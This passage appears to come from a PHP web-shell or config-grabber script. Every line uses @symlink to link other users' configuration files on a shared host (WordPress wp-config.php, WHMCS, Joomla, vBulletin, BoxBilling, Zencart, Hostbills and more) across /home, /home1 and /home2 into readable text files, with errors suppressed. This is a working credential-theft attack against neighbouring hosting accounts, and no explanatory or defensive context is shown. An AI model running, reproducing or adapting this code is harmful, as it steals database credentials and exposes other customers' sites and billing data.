1340. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1341. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1342. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1343. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1344. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1345. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1346. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1347. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1348. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1349. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1350. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1351. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1352. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1353. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1354. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1355. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1356. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1357. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1358. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1359. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1360. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1361. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1362. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1363. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1364. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1365. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1366. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1367. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1368. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1369. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1370. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1371. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1372. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1373. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1374. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1375. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1376. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1377. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1378. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1379. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1380. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1381. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1382. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1383. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1384. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1385. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1386. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1387. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1388. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1389. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1390. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1391. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1392. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1393. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1394. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1395. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1396. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1397. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1398. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1399. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1400. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1401. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1402. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1403. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1404. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1405. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1406. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1407. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1408. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1409. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1410. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1411. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1412. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1413. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1414. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1415. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1416. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1417. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1418. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1419. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1420. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1421. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1422. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1423. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1424. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1425. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1426.  
1427. //Home1
1428.  
1429. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1430. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1431. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1432. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1433. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1434. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1435. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1436. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1437. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1438. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1439. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1440. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1441. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1442. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1443. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1444. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1445. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1446. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1447. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1448. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1449. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1450. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1451. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1452. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1453. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1454. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1455. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1456. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1457. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1458. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1459. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1460. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1461. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1462. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1463. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1464. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1465. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1466. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1467. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1468. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1469. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1470. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1471. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1472. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1473. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1474. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1475. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1476. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1477. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1478. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1479. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1480. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1481. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1482. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1483. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1484. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1485. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1486. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1487. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1488. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1489. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1490. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1491. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1492. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1493. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1494. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1495. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1496. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1497. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1498. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1499. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1500. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1501. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1502. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1503. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1504. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1505. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1506. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1507. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1508. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1509. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1510. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1511. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1512. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1513. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1514. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1515. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1516. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1517. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1518. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1519. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1520. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1521. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1522. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1523. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1524. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1525. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1526. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1527. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1528. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1529. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1530. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1531. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1532. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1533. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1534. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1535. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1536. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1537. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1538. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1539. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1540. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1541. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1542. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1543. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1544. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1545. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1546. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1547. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1548. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1549. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1550. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1551. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1552. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1553. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1554. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1555. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1556. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1557. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1558. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1559. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1560. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1561. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1562. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1563. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1564. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1565. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1566. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1567. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1568. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1569. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1570. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1571. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1572. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1573. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1574. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1575. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1576. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1577. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1578. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1579. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1580. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1581. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1582. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1583. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1584. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1585. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1586. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1587. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1588. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1589. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1590. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1591. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1592. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1593. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1594. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1595. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1596. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1597. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1598. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1599. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1600. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1601. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1602. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1603. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1604. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1605. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1606. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1607. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1608. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1609.  
1610. //Home2
1611.  
1612. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1613. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1614. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1615. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1616. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1617. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1618. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1619. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1620. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1621. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1622. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1623. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1624. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1625. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1626. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1627. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1628. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1629. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1630. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1631. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1632. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1633. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1634. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1635. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1636. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1637. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1638. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1639. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1640. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1641. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1642. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1643. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1644. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1645. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1646. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1647. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1648. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1649. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1650. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1651. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1652. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1653. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1654. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1655. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
